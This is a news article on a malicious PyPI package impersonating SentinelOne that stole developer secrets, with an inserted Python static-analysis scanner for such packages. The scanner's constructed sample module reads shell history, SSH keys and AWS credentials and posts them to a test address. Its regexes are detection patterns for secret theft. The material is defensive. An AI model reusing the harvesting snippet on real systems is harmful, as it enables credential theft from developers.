There’s another malicious PyPI package - this one stealing data from developers
Threat actors tried abusing a legitimate cybersecurity firm
Criminals have been found impersonating a well-known cybersecurity firm in an attempt to steal data from software developers, researchers have found.
Researchers from ReversingLabs recently discovered a malicious Python package on PyPI called “SentinelOne”. Named after a known cybersecurity company from the United States, the package pretends to be a legitimate SDK client allowing easy access to the SentinelOne API from within a separate project.
However, the package also carries “api.py” files which hold the malicious code, allowing the threat actors to exfiltrate sensitive data from the developers to a third-party IP address (54.254.189.27).
Going after auth tokens and API keys
The data being stolen includes Bash and Zsh histories, SSH keys, .gitconfig files, hosts files, AWS configuration info, Kube configuration info, and others. As per the publication, these folders usually store auth tokens, secrets, and API keys, which would enable threat actors further access to target cloud services and server endpoints.
The worst part is that the package does offer the functionality the developers expect. In reality, this is a hijacked package, meaning unsuspecting developers might end up using it and unwittingly becoming victims. The good news is that ReversingLabs confirmed the malicious intent of the package, and after reporting it to both SentinelOne and PyPI, had it removed from the repository.
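The combination described above, a module that reads shell histories, SSH keys, .gitconfig, the hosts file and AWS or kube configuration while also having a way to send data to a hard-coded remote address, is a pattern a defender can look for before installing an unfamiliar package. The following is an added Python example, not code from the article or from ReversingLabs: it parses each source file in a package directory, flags string literals naming those developer files and imports that give the code network egress, and rates a file high only when both appear together. The sample package it builds is constructed for the demo; the file name api.py echoes the article, while the module contents and the 192.0.2.10 address (an RFC 5737 test address) are made up.

```python
"""Static triage of a Python package for developer-secret harvesting plus network egress."""
import ast
import pathlib
import re
import tempfile

# Developer artefacts the article says the package collected; matched against
# string literals in the package's source files (never executed).
SENSITIVE_PATTERNS = {
    "shell history": re.compile(r"\.(bash|zsh)_history"),
    "ssh keys": re.compile(r"\.ssh(/|\\|$)"),
    "git config": re.compile(r"\.gitconfig"),
    "hosts file": re.compile(r"(^|/)etc/hosts"),
    "aws config": re.compile(r"\.aws(/|\\|$)"),
    "kube config": re.compile(r"\.kube(/|\\|$)"),
}
# Top-level modules that give a package a network egress path.
NETWORK_MODULES = {"requests", "urllib", "http", "socket", "httpx", "aiohttp"}
# Hard-coded IPv4 literals (also matches version-like strings; accept that noise in triage).
IPV4_LITERAL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def scan_source(src: str, filename: str = "<string>") -> list:
    """Return (category, line, detail) findings for one Python source text."""
    findings = []
    tree = ast.parse(src, filename)
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for name in names:
                if name.split(".")[0] in NETWORK_MODULES:
                    findings.append(("network_import", node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for label, pat in SENSITIVE_PATTERNS.items():
                if pat.search(node.value):
                    findings.append(("sensitive_path", node.lineno, f"{label}: {node.value}"))
            if IPV4_LITERAL.search(node.value):
                findings.append(("ip_literal", node.lineno, node.value))
    return findings


def risk_level(findings: list) -> str:
    """High only when secret reads and an egress path sit in the same file."""
    cats = {f[0] for f in findings}
    if "sensitive_path" in cats and ("network_import" in cats or "ip_literal" in cats):
        return "high"
    if cats:
        return "medium"
    return "low"


def scan_package(root: pathlib.Path) -> dict:
    """Scan every .py file under root; return {relative path: (risk, findings)}."""
    report = {}
    for path in sorted(root.rglob("*.py")):
        try:
            findings = scan_source(path.read_text(encoding="utf-8"), str(path))
        except SyntaxError as exc:
            findings = [("unparseable", exc.lineno or 0, str(exc))]
        report[str(path.relative_to(root))] = (risk_level(findings), findings)
    return report


# Constructed sample package (not the real package from the article): one benign
# client module and one module that reads developer files and posts them out.
BENIGN_CLIENT = '''
class Client:
    def __init__(self, api_key):
        self.api_key = api_key

    def activities(self):
        return {"endpoint": "/api/activities", "key": self.api_key}
'''

SUSPICIOUS_API = '''
import os, requests

def collect():
    paths = ["~/.bash_history", "~/.ssh/id_rsa", "~/.aws/credentials", "/etc/hosts"]
    return {p: open(os.path.expanduser(p)).read() for p in paths}

def send():
    requests.post("http://192.0.2.10/upload", json=collect())  # 192.0.2.10: RFC 5737 test address
'''


def build_sample_package() -> pathlib.Path:
    """Write the constructed sample package to a temp dir and return its root."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="pkg-triage-"))
    (root / "client.py").write_text(BENIGN_CLIENT, encoding="utf-8")
    (root / "api.py").write_text(SUSPICIOUS_API, encoding="utf-8")
    return root


if __name__ == "__main__":
    for name, (risk, findings) in scan_package(build_sample_package()).items():
        print(f"{name}: {risk}")
        for cat, line, detail in findings:
            print(f"  line {line:>3} {cat:<15} {detail}")
```

Point `scan_package` at an unpacked sdist or wheel (for example after `pip download` without installing) rather than at an installed package, so nothing from the candidate runs during triage. A high rating is a reason to read the file, not proof of malice: a legitimate cloud SDK also touches ~/.aws and imports requests, which is exactly why the check requires both signals in one file and why the hard-coded address is the most telling finding.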
In the days and weeks leading up to the removal, the malicious actors were quite active. The package was first uploaded to PyPI on December 11, and has been updated 20 times in less than 10 days.
One of the issues fixed by an update was the inability to exfiltrate data from Linux systems, the researchers found.
It’s difficult to say if anyone fell for the scam, the researchers concluded, as there is no evidence the package got used in an actual attack. Still, all the published versions were downloaded more than 1,000 times.
Via: BleepingComputer
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.